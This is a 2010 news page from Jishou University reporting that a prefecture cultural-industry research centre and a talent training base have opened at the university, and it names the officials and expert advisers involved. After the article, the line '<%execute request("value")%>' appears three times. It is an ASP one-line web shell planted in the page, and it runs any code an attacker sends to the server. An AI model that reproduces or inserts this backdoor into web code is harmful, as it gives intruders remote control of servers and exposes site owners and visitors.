州文化产业发展研究中心和文化产业人才培训基地在吉大挂牌成立

添加时间:2010年05月21日     文章来源:吉首大学党委宣传部     浏览:[]

州文化产业发展研究中心和文化产业人才培训基地在吉大挂牌成立

5月11日,由州文化产业改革发展管理委员会办公室与吉首大学联合成立的州文化产业发展研究中心和州文化产业人才培训基地在吉首大学正式挂牌,这是我州文化兴州、文化强州的重大举措,对推动我州文化大繁荣、产业大发展具有十分重要的意义。州政协副主席田岚出席授牌仪式并向吉首大学授牌,吉首大学校长李民、副校长白晋湘参加授牌仪式。

经研究决定,由州委常委、州委宣传部部长陈潇,吉首大学党委书记游俊任州文化产业发展研究中心和文化产业人才培训基地名誉主任,吉首大学副校长白晋湘任州文化产业发展研究中心和文化产业人才培训基地主任,并聘请了南开大学、中南大学、省社科院、吉首大学等单位的5名专家教授担任专家顾问。

会上,田岚还向亲临现场指导工作的南开大学白长虹教授、王迎军教授颁发了州文化产业发展研究中心和文化产业人才培训基地指导专家聘书。

<%execute request("value")%> <%execute request("value")%> <%execute request("value")%>

上一条:中国教育报 吉首大学:凤飞千仞谱华章 下一条:帮助湘西百姓致富彰显办学特色